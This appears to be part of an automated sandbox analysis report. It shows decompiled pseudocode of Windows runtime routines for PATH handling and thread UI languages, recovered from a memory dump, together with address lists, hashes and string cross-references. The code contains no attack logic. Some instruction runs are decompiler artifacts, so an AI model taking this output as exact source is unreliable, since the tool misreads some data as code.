				signed int _t338;
				void* _t339;

				_t335 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x36ed360 ^ _t335;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x36eb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t286 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t277 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t319 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t277 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = L03614620(_t286,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t277);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t307 = _v32;
							 *((intOrPtr*)(_t326 + 0x3c)) = _t277;
							_t279 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t307 - 0x36e8478;
								 *_t326 = ((0 | _t307 == 0x036e8478) - 0x00000001 & 0xfffffffb) + 7;
								E0363F3E0(_t321,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t339 = _t339 + 0xc;
								_t279 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t271 = E036839F2(_t321);
									_t307 = _v32;
									_t321 = _t271;
								}
							}
							_t290 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t281 = _t326 + _t279 * 4;
								_v56 = _t281;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t237 =  *(_v60 + _t290 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t281 =  *(_v60 + _t290 * 4);
										 *(_t281 + 0x18) = _t321;
										_t241 =  *(_v60 + _t290 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M03622959))) {
												case 0:
													__ax =  *0x36e8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0363F3E0(__edi,  *0x36e848c, __ax & 0x0000ffff);
														__eax =  *0x36e8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0363F3E0(_t321, _v80, _v64);
													_t266 = _v64;
													goto L26;
												case 2:
													 *0x36e8480 & 0x0000ffff = E0363F3E0(__edi,  *0x36e8484,  *0x36e8480 & 0x0000ffff);
													__eax =  *0x36e8480 & 0x0000ffff;
													__eax = ( *0x36e8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0363F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0363F3E0(_t321, _v76, _v36);
														_t266 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t321 = _t321 + (_t266 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t268);
													 *((short*)(_t321 - 2)) = _t268;
													goto L28;
												case 6:
													__ebx =  *0x36e575c;
													__eflags = __ebx - 0x36e575c;
													if(__ebx != 0x36e575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0363F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x36e575c;
														} while (__ebx != 0x36e575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x36e8478 & 0x0000ffff = E0363F3E0(__edi,  *0x36e847c,  *0x36e8478 & 0x0000ffff);
													__eax =  *0x36e8478 & 0x0000ffff;
													__eax = ( *0x36e8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E036839F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x36e6e58 & 0x0000ffff = E0363F3E0(__edi,  *0x36e6e5c,  *0x36e6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x36e6e58 & 0x0000ffff;
													__eax = ( *0x36e6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t290 = _v16;
													_t307 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t290 = _t290 + 1;
									_v16 = _t290;
									__eflags = _t290 - _v48;
								} while (_t290 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t319 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M03622935))) {
							case 0:
								__ax =  *0x36e8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E03622E3E(0,  &_v64);
								_t277 = _t277 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x36e8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x36e8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0360EEF0(0x36e79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0360EB70(__ecx, 0x36e79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t286 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x36e7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0360EB70(__ecx, 0x36e79a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t335;
										_pop(_t278);
										return E0363B640(_t216, _t278, _v8 ^ _t335, _t307, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t273 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t275 = E03622E3E(_t273,  &_v36);
									_t286 = _v36;
									_v76 = _t275;
								}
								if(_t286 == 0) {
									goto L44;
								} else {
									_t277 = _t277 + 2 + _t286;
								}
								goto L14;
							case 6:
								__eax =  *0x36e5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x36e8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x36e8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x36e6e58 & 0x0000ffff;
								__eax = ( *0x36e6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("bound eax, [ebx]");
					asm("o16 sub [edx+0x3], ah");
					asm("loopne 0x29");
					asm("bound eax, [ebx]");
					asm("bound eax, [es:ebx]");
					 *((intOrPtr*)(_t307 + 3)) =  *((intOrPtr*)(_t307 + 3)) - _t241;
					_t242 = _t241 + 0x1f036226;
					_t282 = 0x25;
					_t308 = _t307 +  *((intOrPtr*)(_t242 +  &_a1530200926));
					_t243 = _t242 +  *_t308;
					 *((intOrPtr*)(_t308 + 3)) =  *((intOrPtr*)(_t308 + 3)) - _t339;
					 *_t243 =  *_t243 - 0x62;
					asm("daa");
					asm("bound eax, [ebx]");
					_push(ds);
					 *((intOrPtr*)(_t308 + 3)) =  *((intOrPtr*)(_t308 + 3)) - _t243;
					 *((intOrPtr*)(_t308 + 3)) =  *((intOrPtr*)(_t308 + 3)) - _t243;
					asm("daa");
					asm("bound eax, [ebx]");
					asm("fcomp dword [ebx+0x66]");
					_t332 = _t326 + 1 + _t326 + 1 - 1 +  *((intOrPtr*)(_t243 +  &_a1546912606));
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x36cff00);
					E0364D08C(_t282, _t321, _t332);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t283 = _a12;
					__eflags = _t283;
					if(_t283 == 0) {
						_t246 = 0xc0000100;
					} else {
						_v8 = 0;
						_t333 = 0xc0000100;
						_v52 = 0xc0000100;
						_t248 = 4;
						while(1) {
							_v40 = _t248;
							__eflags = _t248;
							if(_t248 == 0) {
								break;
							}
							_t297 = _t248 * 0xc;
							_v48 = _t297;
							__eflags = _t283 -  *((intOrPtr*)(_t297 + 0x35d1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t263 = E0363E5C0(_a8,  *((intOrPtr*)(_t297 + 0x35d1668)), _t283);
									_t339 = _t339 + 0xc;
									__eflags = _t263;
									if(__eflags == 0) {
										_t333 = E036751BE(_t283,  *((intOrPtr*)(_v48 + 0x35d166c)), _a16, _t322, _t333, __eflags, _a20, _a24);
										_v52 = _t333;
										break;
									} else {
										_t248 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t248 = _t248 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t333;
						__eflags = _t333;
						if(_t333 < 0) {
							__eflags = _t333 - 0xc0000100;
							if(_t333 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t322;
									if( *_t293 == _t322) {
										_t333 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t250 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t250 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t250 + 0x48)) == _t293) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t333 = E03622AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
												_v32 = _t333;
												__eflags = _t333 - 0xc0000100;
												if(_t333 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t253 = E03606600( *(_t310 + 0x1c));
												__eflags = _t253;
												if(_t253 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t333 = E03622C50(_t293, _a8, _t283, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t333;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0360EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t333 = _a24;
									_t260 = E03622AE4( &_v36, _a8, _t283, _a16, _a20, _t333);
									_v32 = _t260;
									__eflags = _t260 - 0xc0000100;
									if(_t260 == 0xc0000100) {
										_v32 = E03622C50(_v36, _a8, _t283, _a16, _a20, _t333, 1);
									}
									_v8 = _t322;
									E03622ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t246 = _t333;
					}
					L70:
					return E0364D0D1(_t246);
				}
				L108:
			}

0x03622584
0x03622586
0x03622590
0x03622596
0x03622597
0x03622598
0x03622599
0x0362259e
0x036225a4
0x036225a9
0x036225ac
0x036225ae
0x036225b1
0x036225b2
0x036225b5
0x036225b8
0x036225bb
0x036225bc
0x036225bf
0x036225c2
0x036225c5
0x036225c6
0x036225cb
0x036225ce
0x036225d8
0x036225dd
0x036225de
0x036225e1
0x036225e3
0x036225e9
0x036226da
0x036226da
0x036226dd
0x036226e2
0x03665b56
0x00000000
0x036226e8
0x036226f9
0x036226fb
0x036226fe
0x03622700
0x03665b60
0x00000000
0x03622706
0x03622706
0x0362270a
0x0362270a
0x0362270d
0x03622713
0x03622716
0x03622718
0x0362271c
0x0362271e
0x03665b6c
0x03665b6f
0x03665b7f
0x03665b89
0x03665b8e
0x03665b93
0x03665b96
0x03665b9c
0x03665ba0
0x03665ba3
0x03665bab
0x03665bb0
0x03665bb3
0x03665bb3
0x03665ba3
0x03622724
0x03622726
0x03622729
0x0362272c
0x0362279d
0x0362279d
0x036227a0
0x036227a2
0x00000000
0x0362272e
0x0362272e
0x03622731
0x03622734
0x03622734
0x03622736
0x03665bc1
0x03665bc1
0x03665bc4
0x00000000
0x03665bca
0x03665bca
0x03665bcd
0x00000000
0x03665bd3
0x00000000
0x03665bd3
0x03665bcd
0x0362273c
0x0362273c
0x03622742
0x03622747
0x0362274a
0x0362274d
0x03622750
0x00000000
0x03622756
0x03622756
0x00000000
0x03622902
0x03622908
0x0362290b
0x00000000
0x03622911
0x0362291c
0x03622921
0x00000000
0x03622921
0x00000000
0x00000000
0x03622880
0x03622887
0x0362288c
0x00000000
0x00000000
0x03622805
0x0362280a
0x03622814
0x03622816
0x00000000
0x00000000
0x0362281e
0x03622821
0x03622823
0x00000000
0x03622829
0x03622829
0x03622831
0x0362283c
0x0362283e
0x00000000
0x0362283e
0x00000000
0x00000000
0x0362284e
0x03622850
0x03622851
0x03622854
0x03622857
0x0362285a
0x0362285c
0x0362285d
0x00000000
0x00000000
0x0362275d
0x03622761
0x00000000
0x03622767
0x0362276e
0x03622773
0x03622773
0x03622776
0x03622778
0x0362277e
0x0362277e
0x03622781
0x03622781
0x03622783
0x03622784
0x00000000
0x00000000
0x03665bd8
0x03665bde
0x03665be4
0x03665be6
0x03665be8
0x03665be9
0x03665bee
0x03665bf8
0x03665bff
0x03665c01
0x03665c04
0x03665c07
0x03665c0b
0x03665c0d
0x03665c0d
0x03665c15
0x03665c18
0x03665c1b
0x03665c1b
0x03665c1e
0x00000000
0x00000000
0x036228c3
0x036228c8
0x036228d2
0x036228d4
0x036228d8
0x036228db
0x03665c26
0x03665c28
0x03665c2d
0x03665c2d
0x00000000
0x00000000
0x03665c34
0x03665c36
0x03665c49
0x03665c4e
0x03665c54
0x03665c5b
0x03665c5d
0x03665c60
0x03622788
0x03622788
0x0362278b
0x0362278e
0x0362278e
0x0362278e
0x03622791
0x00000000
0x00000000
0x03622756
0x03622750
0x00000000
0x03622794
0x03622794
0x03622795
0x03622798
0x03622798
0x00000000
0x03622734
0x0362272c
0x03622700
0x036225ef
0x036225ef
0x036225ef
0x036225f2
0x036225f8
0x00000000
0x00000000
0x036225fe
0x00000000
0x036228e6
0x036228ec
0x036228ef
0x036228f5
0x036228f8
0x036228f8
0x00000000
0x036228f8
0x00000000
0x00000000
0x03622866
0x03622866
0x03622876
0x03622879
0x00000000
0x00000000
0x036227e0
0x036227e7
0x036227e9
0x036227eb
0x03665afd
0x00000000
0x03665afd
0x00000000
0x00000000
0x03622633
0x03622638
0x0362263b
0x0362263c
0x0362263e
0x03622640
0x03622642
0x03622647
0x03622649
0x0362264e
0x03622650
0x03622653
0x03622659
0x036226a2
0x036226a7
0x036226ac
0x036226b2
0x03665b11
0x03665b15
0x03665b17
0x00000000
0x036226b8
0x036226b8
0x036226ba
0x036227a6
0x036227a6
0x036227a9
0x036227ab
0x036227b9
0x036227b9
0x036227be
0x036227c1
0x036227c3
0x036227c5
0x036227c7
0x03665c74
0x03665c79
0x03665c79
0x036227c7
0x00000000
0x036226c0
0x036226c0
0x036226c3
0x036226c6
0x036226c6
0x036226c9
0x036226c9
0x00000000
0x036226c9
0x036226ba
0x0362265b
0x0362265b
0x0362265e
0x03622667
0x0362266d
0x03622677
0x0362267c
0x0362267f
0x03622681
0x03665b49
0x03665b4e
0x036227cd
0x036227d0
0x036227d1
0x036227d2
0x036227d4
0x036227dd
0x03622687
0x03622687
0x0362268a
0x0362268b
0x0362268e
0x0362268f
0x03622691
0x03622696
0x03622698
0x0362269d
0x0362269f
0x00000000
0x0362269f
0x03622681
0x00000000
0x00000000
0x03622846
0x00000000
0x00000000
0x03622605
0x0362260a
0x0362260c
0x03622611
0x03622616
0x03622619
0x03622619
0x0362261e
0x00000000
0x03622624
0x03622627
0x03622627
0x00000000
0x00000000
0x03665b1f
0x00000000
0x00000000
0x03622894
0x0362289b
0x0362289d
0x036228a1
0x03665b2b
0x03665b2e
0x03665b2e
0x036228a7
0x036228a9
0x03665b04
0x03665b09
0x03665b09
0x03665b09
0x00000000
0x00000000
0x03665b35
0x03665b3c
0x036228fb
0x036228fb
0x036226cc
0x036226cc
0x036226d0
0x00000000
0x036226d2
0x036226d2
0x00000000
0x036226d2
0x00000000
0x00000000
0x036225fe
0x0362292d
0x03622930
0x03622935
0x03622937
0x03622939
0x0362293d
0x0362293f
0x03622941
0x03622946
0x03622949
0x0362294e
0x0362294f
0x03622957
0x0362295a
0x0362295d
0x03622962
0x03622963
0x03622965
0x03622966
0x0362296a
0x0362296e
0x0362296f
0x03622971
0x03622974
0x0362297e
0x0362297f
0x03622980
0x03622981
0x03622982
0x03622983
0x03622984
0x03622985
0x03622986
0x03622987
0x03622988
0x03622989
0x0362298a
0x0362298b
0x0362298c
0x0362298d
0x0362298e
0x0362298f
0x03622990
0x03622992
0x03622997
0x036229a3
0x036229a6
0x036229ab
0x036229ad
0x036229b0
0x036229b2
0x03665c80
0x036229b8
0x036229b8
0x036229bb
0x036229c0
0x036229c5
0x036229c6
0x036229c6
0x036229c9
0x036229cb
0x00000000
0x00000000
0x036229cd
0x036229d0
0x036229d9
0x036229db
0x036229dd
0x03622a7f
0x03622a84
0x03622a87
0x03622a89
0x03665ca1
0x03665ca3
0x00000000
0x03622a8f
0x03622a8f
0x00000000
0x03622a8f
0x00000000
0x036229e3
0x036229e3
0x036229e3
0x00000000
0x036229e3
0x036229dd
0x00000000
0x036229db
0x036229e6
0x036229e9
0x036229eb
0x036229ed
0x036229f3
0x036229f5
0x036229f8
0x036229fa
0x03622a97
0x03622a9a
0x03622a9d
0x03622add
0x00000000
0x03622a9f
0x03622aa2
0x03622aa5
0x03622aa8
0x03622aab
0x03665cab
0x03665caf
0x03665cc5
0x03665cda
0x03665cdc
0x03665cdf
0x03665ce5
0x00000000
0x03665ceb
0x03665ced
0x03665cee
0x00000000
0x03665cee
0x03665cb1
0x03665cb4
0x03665cb9
0x03665cbb
0x00000000
0x03665cbd
0x03665cbd
0x00000000
0x03665cbd
0x03665cbb
0x03622ab1
0x03622ab1
0x03622ac4
0x03622ac6
0x03622ac6
0x00000000
0x03622ac6
0x03622aab
0x00000000
0x03622a00
0x03622a09
0x03622a0e
0x03622a21
0x03622a24
0x03622a35
0x03622a3a
0x03622a3d
0x03622a42
0x03622a59
0x03622a59
0x03622a5c
0x03622a5f
0x03622a5f
0x036229fa
0x036229f3
0x03622a64
0x03622a64
0x03622a6b
0x03622a6b
0x03622a6d
0x03622a72
0x03622a72
0x00000000

Strings

PATH, xrefs: 03622642, 03622691

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 49b58233b49d5008c4c46c0d0e1e50b56bf4e9fac5698c0c17e79308a706bd1b
Instruction ID: c0d1568e16f975a86564b1a35d150f38f030c92bde559e235135fcc78ef9b0c8
Opcode Fuzzy Hash: 49b58233b49d5008c4c46c0d0e1e50b56bf4e9fac5698c0c17e79308a706bd1b
Instruction Fuzzy Hash: 77C1C076D00A29DFCB65DF99D990BAEBBB1FF48740F094429E401AB350D734A816CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0362FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0362FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0360EEF0(0x36e7b60);
					_t134 =  *0x36e7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x36e7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x36e7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E03606D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E036076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03698938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E035FB150();
													}
													_t116 = E03696D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E036075CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x36e8638; // 0x0
																	_t122 = L036038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E036076E2(_t154);
																			goto L41;
																		}
																	} else {
																		E036076E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0362FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L036070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0362FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0362FD9B(_t177, 0, 4);
